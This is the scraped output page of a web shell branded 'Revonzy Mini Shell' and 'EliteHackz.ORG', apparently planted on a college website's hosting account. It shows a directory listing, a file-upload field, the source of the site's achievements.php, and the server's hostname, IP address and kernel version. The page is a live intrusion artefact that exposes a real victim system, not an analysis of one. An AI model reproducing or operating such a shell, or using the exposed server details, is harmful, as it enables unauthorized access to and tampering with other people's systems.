Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/achievements.php

<?php
	require_once("header.php");
?>

<div class="parent_colour container">				
	<div class="department-main-section">	
		<br />
		<center><h2 class="head-title">Student / Staff Achievement</h2>
		<?php
			require_once("academic-left-panel.php");
		?>
		<div class="parent_data_contnr" >
					<div class="data" style="color:white;">
					<table border=2  cellpadding="2px" class="comn_tab">
						<thead style="color:#FFFFFF;">
							<td width="50">Sr.No.</td>
							<td>Title </td>
							<td width="100">View</td>
						</thead>
				<?php
				
				$details = $db->get_all_achievement_images();
				$counter = 0;
				if(!empty($details))
				{
					foreach($details as $record)
					{
						$id 		= $details[$counter][0];
						$title   	= $details[$counter][1];
						$image	 	= $details[$counter][2];
						?>
						 <tr>
                                  <td><?php echo $counter+1; ?></td>
								<td style="text-align:left;"><?php echo $title; ?></td>
						
						<td><a href="/gallery/<?php echo $image; ?>" target="_blank" class="gold_lnks">View</a></td>
						</tr>
						<?php
						$counter ++;
					}
				}else
				{?>
					<center><h3><p>No Data Found...	</p></h3></center>
				<?php
				}
				
				?>
				</table>
					</div>
				</div>
			</div>
		</div>
	</section><!-- end of service section -->

	
<?php
	require_once("footer.php");
?>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4